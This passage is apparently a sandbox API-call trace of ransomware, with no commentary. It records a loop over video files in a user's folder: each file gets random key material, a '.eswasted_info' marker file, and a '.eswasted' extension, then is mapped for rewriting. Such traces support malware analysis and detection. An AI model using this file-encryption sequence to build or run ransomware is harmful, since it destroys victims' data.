CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.802] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.802] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.802] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.811] SetEndOfFile (hFile=0x130) returned 1 [0080.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.850] CloseHandle (hObject=0x130) returned 1 [0080.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.851] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.852] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.852] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\kERAe8X97UnxMx.swf") returned 122 [0080.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2fe) returned 0x71ec18 [0080.852] lstrcpyW (in: lpString1=0x71ed0c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x738d10 [0080.852] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.853] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x738d10 | out: pbBuffer=0x738d10) returned 1 [0080.853] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\kERAe8X97UnxMx.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\kerae8x97unxmx.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.854] WriteFile (in: hFile=0x130, lpBuffer=0x738d10*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x738d10*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.855] SetEndOfFile (hFile=0x130) returned 1 [0080.855] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.855] lstrcpyW (in: lpString1=0x71ed0c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\kERAe8X97UnxMx.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\kerae8x97unxmx.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\kERAe8X97UnxMx.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\kerae8x97unxmx.swf.eswasted")) returned 1 [0080.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\kERAe8X97UnxMx.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\kerae8x97unxmx.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.856] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.856] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.857] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.857] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.857] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.858] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.858] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.866] SetEndOfFile (hFile=0x130) returned 1 [0080.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.868] CloseHandle (hObject=0x130) returned 1 [0080.870] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.870] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.871] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.871] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o-ZL4wZk9ytZU.avi") returned 121 [0080.871] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2fc) returned 0x71ec18 [0080.871] lstrcpyW (in: lpString1=0x71ed0a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.871] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x738d10 [0080.871] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.872] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x738d10 | out: pbBuffer=0x738d10) returned 1 [0080.872] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o-ZL4wZk9ytZU.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o-zl4wzk9ytzu.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.872] WriteFile (in: hFile=0x130, lpBuffer=0x738d10*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x738d10*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.873] SetEndOfFile (hFile=0x130) returned 1 [0080.874] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.874] lstrcpyW (in: lpString1=0x71ed0a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o-ZL4wZk9ytZU.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o-zl4wzk9ytzu.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o-ZL4wZk9ytZU.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o-zl4wzk9ytzu.avi.eswasted")) returned 1 [0080.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o-ZL4wZk9ytZU.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o-zl4wzk9ytzu.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.875] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0080.877] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.878] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.878] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.878] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.879] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.879] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.887] SetEndOfFile (hFile=0x130) returned 1 [0080.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.889] CloseHandle (hObject=0x130) returned 1 [0080.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.934] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.935] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.935] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o_2HtOXNpw.swf") returned 118 [0080.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f6) returned 0x71ec18 [0080.935] lstrcpyW (in: lpString1=0x71ed04, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.935] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.936] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.936] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o_2HtOXNpw.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o_2htoxnpw.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.108] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.129] SetEndOfFile (hFile=0x130) returned 1 [0081.129] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.129] lstrcpyW (in: lpString1=0x71ed04, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o_2HtOXNpw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o_2htoxnpw.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o_2HtOXNpw.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o_2htoxnpw.swf.eswasted")) returned 1 [0081.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\o_2HtOXNpw.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\o_2htoxnpw.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.130] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.131] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.132] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0081.132] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.132] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.132] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.133] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.141] SetEndOfFile (hFile=0x130) returned 1 [0081.143] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.143] CloseHandle (hObject=0x130) returned 1 [0081.146] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.146] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.147] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.147] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\qKmHLYrXKCEBIvCLAq.mp4") returned 112 [0081.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ea) returned 0x71ec18 [0081.147] lstrcpyW (in: lpString1=0x71ecf8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.147] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.148] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.148] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\qKmHLYrXKCEBIvCLAq.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\qkmhlyrxkcebivclaq.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.233] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.235] SetEndOfFile (hFile=0x130) returned 1 [0081.235] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.235] lstrcpyW (in: lpString1=0x71ecf8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\qKmHLYrXKCEBIvCLAq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\qkmhlyrxkcebivclaq.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\qKmHLYrXKCEBIvCLAq.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\qkmhlyrxkcebivclaq.mp4.eswasted")) returned 1 [0081.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\qKmHLYrXKCEBIvCLAq.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\qkmhlyrxkcebivclaq.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.236] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.239] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.240] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.240] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.240] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.241] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.241] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.249] SetEndOfFile (hFile=0x130) returned 1 [0081.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.251] CloseHandle (hObject=0x130) returned 1 [0081.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.253] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.254] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.254] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\vLaYCIBHP3FGy1qS6NL.flv") returned 96 [0081.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ca) returned 0x71ec18 [0081.254] lstrcpyW (in: lpString1=0x71ecd8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.254] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.255] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.255] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\vLaYCIBHP3FGy1qS6NL.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\vlaycibhp3fgy1qs6nl.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.255] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.256] SetEndOfFile (hFile=0x130) returned 1 [0081.257] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.257] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.257] lstrcpyW (in: lpString1=0x71ecd8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\vLaYCIBHP3FGy1qS6NL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\vlaycibhp3fgy1qs6nl.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\vLaYCIBHP3FGy1qS6NL.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\vlaycibhp3fgy1qs6nl.flv.eswasted")) returned 1 [0081.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\vLaYCIBHP3FGy1qS6NL.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\vlaycibhp3fgy1qs6nl.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.257] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.259] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.259] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.259] CryptReleaseContext 